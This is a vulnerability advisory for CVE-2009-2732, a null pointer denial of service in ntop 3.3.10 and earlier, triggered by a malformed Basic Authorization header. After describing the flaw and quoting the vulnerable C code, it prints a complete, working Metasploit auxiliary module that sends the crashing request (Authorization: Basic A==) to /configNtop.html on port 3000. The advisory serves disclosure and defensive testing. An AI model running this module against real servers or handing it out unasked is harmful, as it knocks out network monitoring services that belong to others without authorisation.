ntop 3.3.10 Denial Of Service

`Title: ntop <= 3.3.10 Basic Authentication Null Pointer Denial of Service  
---------------------------------------------------------------------------------  
  
Vendor: ntop  
  
Vendor URL: www.ntop.org  
  
Vendor Response: None  
  
Description:  
  
A denial of service condition can be reached by specifying an invalid value for the Authorization   
HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on  
a colon. When no colon exists in the decoded string the username is left at its default NULL value.   
During the authentication process the length of the username is computed via strlen(), which results  
in a segmentation fault when it processes the null value.   
  
Code:  
  
static int checkHTTPpassword(char *theRequestedURL,  
int theRequestedURLLen _UNUSED_,  
char* thePw, int thePwLen) {  
char outBuffer[65], tmpOutBuffer[65], *user = NULL, users[LEN_GENERAL_WORK_BUFFER];  
  
.  
.  
.  
if(outBuffer[i] == ':') {  
outBuffer[i] = '\0';  
user = outBuffer;  
break;  
}  
.  
.  
.  
if(strlen(user) >= sizeof(theHttpUser)) user[sizeof(theHttpUser)-1] = '\0';  
.  
.  
.  
  
  
Affected Operating Systems:  
Only tested on Linux  
  
Affected Versions:  
ntop <= 3.3.10  
  
CVE: CVE-2009-2732  
  
Credit:  
  
Brad Antoniewicz  
  
[email protected]  
  
  
code:  
  
START modules/auxiliary/dos/http/ntop_basic.rb ---------------------------------------  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Auxiliary  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'NTOP <= 3.3.10 Basic Authorization DoS',  
'Description' => %q{  
A denial of service condition can be reached by specifying an invalid value for the Authorization   
HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on  
a colon. When no colon exists in the decoded string the username is left at its default NULL value.   
During the authentication process the length of the username is computed via strlen(), which results  
in a segmentation fault when it processes the null value.   
},  
'Author' => 'Brad Antoniewicz <[email protected]>',  
'License' => MSF_LICENSE,  
'Version' => '1',  
'References' => [  
[ 'BID', 'None'],  
[ 'CVE', 'CVE-2009-2732']  
  
],  
'DisclosureDate' => 'Aug 08 2009'))  
register_options( [Opt::RPORT(3000),], self.class )  
  
end  
  
def run  
begin  
o = {  
'uri' => '/configNtop.html',  
'headers' => {  
'Authorization' => 'Basic A=='  
}  
}  
  
c = connect(o)  
c.send_request(c.request_raw(o))  
  
print_status("Request sent to #{rhost}:#{rport}")  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
print_status("Couldn't connect to #{rhost}:#{rport}")  
rescue ::Timeout::Error, ::Errno::EPIPE   
end  
end  
end  
  
END modules/auxiliary/dos/http/ntop_basic.rb ---------------------------------------`